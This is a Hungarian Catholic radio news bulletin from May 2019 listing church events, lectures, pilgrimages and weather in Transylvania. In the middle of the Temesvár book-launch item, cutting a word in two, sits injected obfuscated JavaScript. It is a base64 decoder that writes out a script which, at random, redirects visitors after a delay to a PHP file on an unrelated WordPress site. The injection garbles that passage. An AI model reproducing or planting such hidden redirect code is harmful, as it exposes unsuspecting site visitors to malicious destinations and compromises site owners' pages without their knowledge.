2019. május 9. – Hírek és programajánló

H Í R E K   D É L B E N

Előadás Csíkszeredában
A Honfoglalás előttől az Európai Unió utánig előadássorozat keretében, május 10-én, holnap délután 6 órától: Baricz Lajos maros-szentgyörgyi plébános: Édesanya a magyar költészetben, irodalomban, a szentírásban és a saját verseimben címmel tart előadást a városháza gyűléstermében. Várnak minden érdeklődőt, különösen az édesanyákat!

Alapkő letétel Kárásztelken
Május 10-én, holnap déli 12 órakor helyezik el az épülő új óvoda alapkövét Kárásztelken, mely eseményen részt vesz Böcskei László megyéspüspök is. Az építkezést Magyarország Kormánya Kárpát-medencei Óvodafejlesztési Programjának keretében a Miniszterelnökség Nemzetpolitikai Államtitkársága, illetve a Bethlen Gábor Alapkezelő Zrt. támogatja, és a Nagyváradi Római Katolikus Püspökség bonyolítja le.

Továbbképző a Marienheim házban
A temesvári Püspökség keretében működő Egyházmegyei Ifjúsági Központ szervezésében ifjúsági csoportvezetőknek tartanak továbbképző tanfolyamot május 10-12. között a Marienheim ifjúsági házban. A kurzust azoknak a fiataloknak szervezik, akik a különböző ifjúsági rendezvényeken csoportvezetőként tevékenykednek, a plébániákon munkájukkal segítik a lelkipásztort és részt vállalnak az ifjúsági csoportok rendszeres találkozóinak megszervezésében, levezetésében.

Imanap a papi hivatásokért a plébániákon
2018. advent első vasárnapjával a HIVATÁSOK ÉVE vette kezdetét a Gyulafehérvári Főegyházmegyében. Ennek a tematikus évnek plébániai, lelkiségi és főegyházmegyei szinten is több eseményt, rendezvényt és imaalkalmat szentelnek a hivatás témájának. Május 11-én, hivatások vasárnapjának szombatján imanapot tartanak a papi hivatásokért a plébániákon.

Hivatások Világnapja
Húsvét 4. vasárnapján tartja az egyház a Hivatások Világnapját: ilyenkor a földkerekség minden táján azért imádkozunk, hogy a Jó Pásztor óvja a szolgálatára elköteleződött papokat és szerzeteseket, illetve támasszon új papi és szerzetesi hivatásokat. A nagyváradi egyházmegye templomaiban május 12-én az oltárra helyezik az egyházmegye papjainak, szerzeteseinek és papnövendékeinek neveit tartalmazó cetliket, a szentmise végén pedig a hívek húznak egy-egy cetlit és a hét folyamán a cetlin megnevezett személyért imádkoznak.

Könyvbemutató Temesváron
Budapesten, az MTA ELTE Egyetemtörténeti Kutatócsoport több éve dolgozik azon, hogy feltárja a történelmi Magyarországon 1850 előtt létezett valamennyi egyházi és világi felsőoktatási intézmény hallgatói adattárát. A Temesvári Püspöki Levéltárban végzett kutatások eredményeképpen született meg dr. Szögi László egyetemi tanár kötete, amelynek címe: A temesvári felsőoktatás intézményeinek hallgatói 1804-1852. A könyvben a Püspöki Szeminárium, illetve a Püspöki Joglíceum 1245 növendékének adatai kerültek feldolgozásra, és rövid román nyelvű összefoglaló is társul hozzá.
A kötet bemutatójára május 14-én, kedden két helyszínen kerül sor: 11 órakor a temesvár-mehalai plébánián megtartfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andó temesvári és dettai esperesi kerület ülésének keretében, valamint 17 órakor a Gerhardinum Római Katolikus Líceumban. A szervezők minden érdeklődőt szeretettel várnak.

Találkozások a találkozásig
Május 31-én, közvetlenül a pápalátogatás előtti napon, a csíkszeredai templomok szentmisével várják a zarándokokat, és az este, éjszaka folyamán nyitva állnak, várva a megpihenni, felfrissülni vágyó zarándokokat.
A lelkiségi mozgalmak közös virrasztásra hívják a zarándokokat a Segítő Mária Gimnázium Kollégiumának kápolnájába. Ferenc pápa szorgalmazza a szentségi jelenlétben töltött időt. Felhívásban kérte a 24 órás szentségimádásokat. Konkrét elköteleződésre hív, kapcsolataink, figyelmünk megújítására. A zarándokok hajnalban a virrasztás után közösen indulnak a csíksomlyói Nyeregbe.
Június 1-jén, reggel 6 órától találkozásra hangoló fogadja a Nyeregben az érkezőket. Ennek célja előkészíteni, ráhangolni a jelenlévőket a találkozásra, az együtt ünneplésre, lehetőséget nyújtva egyházunk gazdagságát, sokszínűséget megtapasztalni és inspirációt kapni az együtt járásra, haladásra.
A pápai szentmise után a Nyeregben a Mustármag Énekegyüttes előadja a Népemért vállalom zeneművet, melyből kicseng: Márton Áron élete, elkötelezettsége, konkrétuma, szolidaritása ma is követendő példa mindannyiunk számára. Vele, az ő példája nyomán megtanulhatunk újra együtt járni, haladni.

Medjugorje-i zarándolat
Június 24-29. között Bartos Károly plébános lelkivezetésével, zarándoklatot szerveznek Medjugorjeba.
A zarándoklat ára: 145 euro/személy
További információ a 0742-698166-os telefonszámon kapható.

Időjárás: Ma ismét sokfelé várható eső, egy-egy helyen akár zivatar is kialakulhat. Élénk, helyenként erős lesz a déli-délnyugati szél. A legmagasabb hőmérséklet 14 és 19 fok között alakul.
Holnap a napos időszakok mellett szórványosan záporokra, zivatarokra készülhetünk. A reggeli órákban helyenként pára-, ködfoltok fordulhatnak elő.
A meteorológusok figyelmeztetése szerint, magas lavinaveszély van a Fogarasi-havasokban, az 1800 méter fölötti régióiban, többek közt a Bâlea-tó környékén. A Bâlea-tónál a hóréteg vastagsága megközelíti a 2 métert.

MRE - Hírszolgálat, 2019. május 9.

 

H Í R E K   R E G G E L

Örökös szentségimádási nap
A gyulafehérvári főegyházmegyében a mai nap folyamán Nagykászonban tartják az örökös szentségimádási napot. Soha ne szűnjünk meg hálát adni a megváltás ajándékáért, dicsőítve és imádva Krisztust a legméltóságosabb Oltáriszentségben.

Előadások Marosvásárhelyen
A Katolikus Magyar Bibliatársulat szervezésében két előadást is tartanak Marosvásárhelyen: az elsőt, Ferenc pápa egyházképe a Biblia tükrében címmel ma reggel 8 órától, a Szent Család Közösségi Házban, míg a másikat május 11-én, szombaton délelőtt 10 órától A péteri szolgálat a Biblia tükrében címmel a Keresztelő Szent János plébánián. Mindkét előadásra várnak minden érdeklődőt.

Szentségimádások Nagyváradon
Ma tartjuk a csendes szentségimádást rádiónk stúdiójának kápolnájában. Reggel fél 9-től szentmise lesz, majd délután 3 óráig várjuk az imádkozni és engesztelni vágyókat.
Minden hónap második csütörtökjén, így ma is ifjúsági szentségimádást tartanak a fiatalokkal és a fiatalokért Nagyváradon a Szent Katalin-telepi plébániatemplomban este 7 órai kezdéssel. A lazarista atyák hívják mindazokat, akik a Krisztus jelenlétében fellelhető örömet és békét keresik. A szentségimádás után kötetlen beszélgetésre, teázásra várnak mindenkit a plébánia közösségi termébe.

Alapkő letétel Kárásztelken
Május 10-én, holnap déli 12 órakor helyezik el az épülő új óvoda alapkövét Kárásztelken, mely eseményen részt vesz Böcskei László megyéspüspök is. Az építkezést Magyarország Kormánya Kárpát-medencei Óvodafejlesztési Programjának keretében a Miniszterelnökség Nemzetpolitikai Államtitkársága, illetve a Bethlen Gábor Alapkezelő Zrt. támogatja, és a Nagyváradi Római Katolikus Püspökség bonyolítja le.

Nyílt nap a szociális testvéreknél
Május 11-én, szombaton Salkaházi Boldog Sára vértanú, szociális testvér emléknapja lesz. Ebből az alkalomból a kolozsvári szociális testvérek nyílt napot szerveznek a hivatások éve jegyében, melynek keretében délelőtt 10 órakor sor kerül a Boldog Sára testvérről elnevezett kis lelkiségi központ megáldására is, a Szentegyház utca 7 szám alatt.
A program ünnepélyes szentmisével kezdődik reggel 9 órakor a Piarista templomban, a megáldás után pedig változatos programokon vehetnek részt az érdeklődők, mint például: kreatív foglalkozás, lectio divina, húsvéti meditáció, meseterápia, vagy rendhagyó irodalomóra. A teljes program megtalálható a testvérek honlapján, a www.sssromania.ro oldalon, az esemény facebook-oldalán, vagy a romkat.ro oldalon is. A programokra bejelentkezés szükséges, melyet megtehetnek a szocialis.testverek@gmail.com címen, vagy telefonon a 0752-453218 számon Czimbalmos Emília testvérnél. Minden érdeklődőt szeretettel várnak.

Bérmálások a nagyváradi egyházmegyében
Május 12-én Böcskei László megyéspüspök elkezdi a bérmálásokat a nagyváradi egyházmegyében. Reggel 9 órakor 7 magyar fiatalnak, délelőtt 11 órakor pedig 40 szlovák fiatalnak szolgáltatja ki a bérmálás szentségét az élesdi plébániatemplomban. Délután 6 órakor 40 román fiatal részesül a keresztény nagykorúság szentségében a nagyváradi román személyi plébánia templomában, az egykori kapucinus templomban. Imádkozzunk fiataljainkért, hogy nyitott szívvel fogadják a Szentlélek ajándékait.

Kerékpáros Mária maraton a szentatya csíksomlyói látogatására
Május 21 és június 2-ka között a Mária Út egyesület kerékpáros Mária maratont szervez Budapestről Csíksomlyóra a szentatya látogatására. A zarándoklat lelki vezetője: Szabó István görögkatolikus pap. Bővebb információk a www.mariaut.hu oldalon találhatóak.

Média-pályázat 2019
A Nemzetközi Eucharisztikus Kongresszusra készülve „Minden forrásom belőled fakad” mottóval média-pályázatot hirdet a Nagyváradi Római Katolikus Egyházmegye, melynek témája az Oltáriszentség és annak tisztelete az egyházmegye közösségeiben és hívek életében. A pályázatra 14-24 éves, az egyházmegye plébániáihoz tartozó fiatalok egyéni vagy csoportos formában jelentkezhetnek. A pályamunka formája lehet: írott sajtó fotóval (1-2 A4 oldal), hanganyag (5-10 perc) vagy videó anyag (5-10 perc), tartalmát tekintve pedigt: interjú, tanúságtétel, tudósítás, stb.
A pályamunkák leadási határideje május 31. Bemutatás és díjazás június 15-én lesz, az Egyházmegyei Médianap keretében.

Időjárás: Az országos katasztrófavédelmi felügyelőség (IGSU) tájékoztatása szerint Maros, Máramaros, Beszterce-Naszód, Argeş, Bákó, Călăraşi, Iaşi, Neamţ, Prahova, Suceava és Vaslui megyében adódtak problémák az esőzések és az erős szél miatt.
Kilenc személyt evakuáltak a katonai tűzoltók az árvíz által leginkább fenyegetett térségekben, ugyanakkor 262 gazdaságból és 38 épület alagsorából kellett kiszivattyúzniuk a vizet. Az áradások mintegy 45 lakásban tettek kárt - közölte még a felügyelőség.
Ma is sokfelé várható eső, helyenként beágyazott záporok, egy-egy helyen akár zivatar is kialakulhat. Élénk, helyenként erős lesz a déli-délnyugati szél. Hajnalban 3-8, délután pedig 10-18 fok valószínű. a RomKat.ro oldal, az egyházmegyéink híreit összefoglaló honlap eseménynaptára.

MRE - Hírszolgálat, 2019. május 9.

About the author

Tunde Vidican Lokodi